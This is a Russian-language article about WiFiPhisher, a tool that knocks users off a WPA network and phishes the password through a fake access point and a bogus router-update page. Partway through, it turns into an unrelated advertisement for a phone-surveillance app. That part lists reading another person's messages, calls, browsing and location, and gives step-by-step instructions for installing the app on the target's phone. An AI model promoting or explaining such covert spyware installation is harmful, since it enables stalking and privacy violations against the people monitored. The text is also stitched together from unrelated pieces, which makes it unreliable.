Эксперт научился взламывать Wi-Fi с протоколом WPA

Club.Com

Джордж Чатзисофронью, эксперт по шифрованию информации из Греции, является активным участником ресурса GitHub, на котором выкладываются исходные коды к различным утилитам, а также эксклюзивные и уникальные разработки. Новый инструмент, созданный этим человеком, позволяет удалённо взламывать сеть Wi-Fi, в которой используется устаревший защитный протокол WPA. Современные модемы активно эксплуатируют его вторую и третью версии, а вот для старого оборудования именно WPA считается наиболее распространённым стандартом.

Для хищения пароля доступа не потребуется подбирать слово через брутфорс, перебором массивных словарей. Всё намного проще, поскольку WiFiPhisher позволяет отправлять на нужную точку Wi-Fi команды об отказе оборудования, в итоге соединение пользователя разрывается. Затем программа создаёт фишинговую точку, куда модем жертвы отправляет запрос на подключение. В итоге происходит кража личной информации. Есть и некоторые сложности в работе, связанные с необходимостью подмены MAC-адреса. Сделать это возможно не во всех ситуациях, многие модемы по умолчанию умеют обходить подобное вмешательство в систему.

После того, как фальшивая Wi-Fi сеть становится активной, жертве предлагается сайт, где якобы потребуется подтвердить пароль для обновления прошивки на маршрутизатор. При этом на экране выводится большое количество уведомлений, включая и защиту файервола компьютера. Только если жертва игнорирует все предупреждения, появляется возможность перехватить нужный пароль. Как и большинство существующих методик социальной инженерии, данный инструмент тоже ориентируется на невнимательность пользователя, на отсутствие элементарных знаний о безопасности работы с Wi-Fi. Более опытный человек вряд ли попадётся на такие уловки.

Эксперт отмечает, что не преследовал злого умысла при разработке данной утилиты. Его целью было тестирование протокола WPA, дыр в котором оказалось значительно больше, чем было видно на первый взгляд. Параллельно на GitHub приведены советы, позволяющие эффективно избежать аналогичной атаки. Инновация состоит именно в том, что такой взлом не потребует много времени, в отличие от варианта с брутфорс-базой. Весь процесс может занимать считанные минуты, зависит от активности жертвы.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.